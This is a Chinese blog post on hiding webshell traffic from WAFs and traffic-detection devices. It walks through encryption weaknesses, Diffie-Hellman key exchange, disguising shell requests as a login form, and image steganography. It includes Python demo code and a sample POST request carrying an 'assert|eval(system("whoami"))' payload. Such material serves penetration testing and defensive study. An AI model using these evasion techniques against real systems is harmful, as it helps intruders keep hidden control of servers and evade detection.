近几年做渗透测试的时候总是遇到流量特征太明显而被拦截甚至封IP
的情况,每次都要耗半天劲去想办法,甚至尝试过改造蚁剑的编码器,奈何NodeJS
的功底太差(甚者可以说不会)写到一半就烂尾了。于是就开始自己用Python
写了个简单WebShell
管理器来绕过流量检测,当然这东西都是后话,这个文章主要还是为分享一下自己的一些绕过思路。
前言:
本文大概3000字,请合理分配阅读时间。 本文中的代码为了用来演示而写的,不代表最后的成品脚本。 此文中的所有方法以客户端和服务器中间的 WAF
不知道服务器上Web Shell
的文件内容为前提。此文当中默认当 web shel
是免杀,所以不考虑shell
被杀的问题。
一、编码
编码是最常见的绕过方式,像蚁剑这种就是使用编码的典型工具。常见的编码也就是base64
、URL
、Hex
、Unicode
之类的了,所以编码这块儿本文不再过多阐述。
二、加密
加密也是常用的绕过流量检测的方法,比如冰蝎、哥斯拉这两个web shell
管理工具就是使用加密来绕过流量检测(虽然说现在会被拦截了,但是刚发布的时候是还是很稳的)。常用的加密方式一般是XOR
、AES
等对称加密方式(这里暂时不考虑RSA
这种非对称加密,这东西简直是bug
一般的存在)。这种对称加密有个很大的弊端:
-
动态的密钥会在 HTTP
包里泄露。 -
静态密钥容易被机器学会特征。
1、动态的密钥会在HTTP
包里泄露
以冰蝎的动态密钥为例:
HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 15:28:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=s9e7ldh4sogigtbuq4u8hqnr14; path=/
Connection: close
Content-Type: text/html
Content-Length: 16
3f2a8ede95042ddc
这个是第一次请求时交换的密钥,之后就会以3f2a8ede95042ddc
来进行加解密,如下面这个POST
包
用3f2a8ede95042ddc
解密得到:
所以通过这个例子可以看到密钥是泄露在HTTP
包里的。
2、静态密钥容易被机器学会特征
在使用一些对称加密算法会因为密码和前几个字节是固定的,导致加密后前几个字符也一直是固定的(部分编码也有这个特征),从而会被WAF
给学会特征来拦截。以XOR
和AES-ECB
来举例:
import random
import string
from Crypto.Cipher import AES
key = 'this_is_key!!!!!' # 用感叹号填充到16个字符,方便加密
regular_data = "assert|eval(base64_decode('%s'))" # 以冰蝎的payload为例
def random_char(num):
return ''.join(random.choices(string.ascii_letters, k=num))
def xor(text: str, key: str):
result = ''
for i in range(max(len(text), len(key))):
result += chr(ord(text[i % len(text)]) ^ ord(key[i % len(key)]))
return result
def aes_encrypt(text: str, key: str):
aes = AES.new(key.encode(), AES.MODE_ECB)
return aes.encrypt(text.encode())
for i in range(10):
print(xor(regular_data % random_char(10), key).encode())
for i in range(10):
print(aes_encrypt(regular_data % random_char(16 - (len(regular_data) - 2 + 10) % 16 + 10), key))
# XOR加密
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^mLl{qx12x10;+nNZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^@vk[Sx16?x10x18x14NZv'
# b"x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^PfLIF8-;'8NZv"
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^plBr{x0ctx05%x18NZv'
# b"x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^ictcix17x01x07x19'NZv"
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^kljxTx1ax0cx00x0b5NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^I{vBHx04x05!x17x12NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^uJ@NRx01+;nx16NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^gmDXlx06 /n-NZv'
# b'x15x1bx1ax16-x1dx0f:x1dx04x15tC@RDB\6x17:nx1c;x0eM^MkvTmx05?x19x17<NZv'
# AES加密
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxecx8cx03x0c7xd8xe09>xcecUxc9xe4;x8a5xaaxc3xe2x08xcax99Ox1dGx99Wxd8x80vs'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxa5xfaxcef5xeeMxb2x92xf3x02xf6x82>k`x82xd7d{x13x02Rxf9yxb697xc2x87x98x12'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSx83pxa5rxdaxf3x8bx99{x13Vxa8rx9dZxf4&35x03TxabxabxxdcN)x81xbdlx1ex03'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxa3xf1xabxf1Zxb9xc1x98Lxc1Bx97xeeVx04xdaxbfeufxf9xa5T{[x07xc1[xcdxd9(xf2'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxc4oh"K!x1ax8dWx95\xfax8e^xbc@Yxaexe8x07x10(nX}ex00Ix8el_o'
# b"x9c(_63xb9x94xa5x99sUx99\3x8aSex97x17Gx7fx87xb0xa8x16E|xf3x17xbdx82x11'x8fxc9xb0bxb6xaaxd9xdbxffxb7Txd6x00xa0xa9"
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSxeexe3xd4wxafgkxf2xcdx89%x866xb3=(x9cxffjxe2x7fx98xb9x06jg]xccSx1fxabxe6'
# b"x9c(_63xb9x94xa5x99sUx99\3x8aSx1c.a'g>xbax9awTGx0bx16xef7x88xccx84x0fpxad.x0cL;x9dxd0cxfaxccva"
# b'x9c(_63xb9x94xa5x99sUx99\3x8aSoNx1c3xc0Hxc0Fx9cxf7xfbx96rx99x94xecIx1f{x90xc8xecx01,H(xcc vW&x1f'
# b'x9c(_63xb9x94xa5x99sUx99\3x8aS4xd1x05xabDIx9a0x7fx98^xfdx80`/x81Ix0bXx8cxb7x10xc6x10xe5xb3x93rxcbxdfzx0c'
如上面的代码所示,可以看到不论是XOR
还是AES
加密,因为密钥和明文的前几个字符是固定的(AES
要求一组为16
字节,所以最少要16
个字符是固定的才行,当然并不是所有的模式都这样,比如AES-CBC
就不会),最后导致的就是前几个密文每次都一样,很容易被机器学习给学会特征
3、怎么办呢?
其实解决方法不难,那就是大名鼎鼎的Diffe-Hellman
算法,这个算法一般用在密钥交换上,刚好可以用在这里。具体的算法如下图所示
其中:a
、b
、p
都是素数,g
任意。用代码尝试一下
import random
a = 13
b = 11
p = 7
g = random.randint(10, 20)
A = g ** a % p
B = g ** b % p
print(A ** b % p == B ** a % p)
# True
所以在实战环境中,服务端可以通过第一次请求获得的g
、p
、A
来计算出K
然后存到session
当中并返回自己的B
,这样不仅可以在后续的请求中直接使用K
来进行加密通信而不被WAF
发现的同时还可以随时更换密钥。
三、混淆
混淆也是躲避流量检测设备的有利方法之一,其鼻祖个人认为应该是ShadowSocksR
了,它的混淆模式方便了许多人上网。至于SSR
具体的原理这里先开个坑,若想了解可以上网搜索。在实际环境中使用加密是为了防止中间人截获我们原始的payload
,虽然加密也能起到绕过流量检测设备的作用,但有时候也可能会因为频繁请求而被识别为恶意流量,这时候就需要将我们加密后的(或原始的)payload
进行混淆来防止被流量检测设备识别。
1、根据网站原始页面进行流量仿造
一般网站正常情况下不是返回HTML
和图片就是返回JSON
和XML
(使用JS
进行自加密发送的情况不考虑),所以可以提前定义好请求信息和响应信息,在后续的请求中按照格式去请求。举个例子,以登录页面为例,加入登录页面有一个登录接口,POST
了username
和password
,并且返回信息是一段HTML
,则可以将Web Shell
伪装成这个接口。则理想的请求信息应该如下:
请求信息:
POST /shell.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html
Connection: close
username=admin&password=assert%7Ceval%28%27system%28%22whoami%22%29%27%29&submit=%E7%99%BB%E9%99%86
响应信息:
HTTP/1.1 200 OK
Date: Tue, 16 Aug 2022 15:28:43 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
<html>
<head>
<script src="/static/js/jquery.js"></script>
<title>登录</title>
</head>
<body>
<div class="form-control">
<p class="form-error">NT AUTHORITYSYSTEM</p>
<form class="form-block" action="/shell.php" method="post">
<input class="input-block" type="text" name="username" />
<input class="input-block" type="password" name="password" />
<input class="input-block" type="submit" name="submit" value="登录" />
</form>
</div>
</body>
</html>
根据上面的请求信息和响应信息,不难看出shell
的链接密码是password
,而返回的结果是<p>NT AUTHORITYSYSTEM</p>
,也就是包裹在了原来本应该显示错误信息的地方,这样就做到了上面说到的仿造正常页面。
2、隐写
隐写是我在CTF
当中经常遇到的东西,可以利用其思路将payload
的每个字符写入到图片的每个字符当中,其中需要处理的问题是如果payload
不够长会填不满图片或者payload
过长导致图片不够写。后面的情况可以通过更换更大的图片来变为第一种情况。
而第一种情况则需要填充,我个人偏向于先将payload
使用base64
编码,消除掉不可见字符,然后再使用不可见字符(如x00
、xff
等),服务端获取后直接剔除不可见字符再base64
解码即可。
以本公众号的logo
为例,通过PIL
库可以将payload
写入到图片的每个像素中的alpha
通道中,也就是透明度。
一个使用16位存储的图片,5位表示红色,5位表示绿色,5位表示蓝色,1位是阿尔法。在这种情况下,Alpha值只能为0或1,要么透明,要么不透明;
一个使用32位存储的图片,每8位表示红绿蓝和阿尔法通道。在这种情况下,Alpha通道不只可以表示透明还是不透明,还可以表示256种不同的透明度。
所以我们这里用32位存储的图片。代码如下:
from PIL import Image
payload = 'aseert|eval('system("whoami")')' + ';' * (1200 * 1000) # 填充脏数据,只为了演示
image = 'logo.png'
img = Image.open(image)
img = img.convert('RGBA')
x, y = img.size
# 确保图片的像素点放得下payload
assert x * y >= len(payload)
# 填充payload到图片像素点的数量
payload = payload + 'x00' * (x * y - len(payload))
for i in range(x):
for j in range(y):
color = img.getpixel((i, j))
new_color = color[:-1] + (ord(payload[i * x + j]), )
img.putpixel((i, j), new_color)
img.show()
img.save('anioner.png')
这个代码即可做到将字符串隐写到图片当中,效果如下:
如何解密呢?那就是反向操作把RGBA
取出来然后把A
转成字符串即可。
总结
实际上,上面的那些绕过方式还是有问题的,这里列举一些各自的优缺点。
-
Diffe-Hellman
算法 -
优点:
1、能够有效防止中间人获取到密钥从而解密流量
-
缺点:
1、那些素数过小时会导致很容易就被爆破出来密钥
2、如果素数过大(哪怕是3位整数)会导致整型溢出而计算错误
3、需要额外一次请求来获取密钥,增加了特征
-
页面仿造
-
优点:
1、增加判断难度,尤其是在配合了加密后
2、管理员的溯源难度增加那么一丢丢
-
缺点:
1、过多的增加了原来的数据大小,网络环境差时会导致传输很慢的问题
2、若原始的
payload
未进行加密或编码依然会被检测出特征 -
图片隐写
-
优点:
1、无法肉眼判断
2、很少有
WAF
检测图片3、随时可以更换隐写载体,如视频、音频等
-
缺点:
1、数据长度较原始
payload
增大了很多2、频繁的
POST
图片也是一个特征3、容易被提取,需要加密
其实绕过流量检测设备的方法很多,上面列举的只是我自己一堆想法中的几个,个人认为其中的Diffe-Hellman
算法在解决了额外的一次请求之后应该是很无敌的存在。
原文始发于微信公众号(Anion的小黑屋):浅谈几种绕过流量检测的方法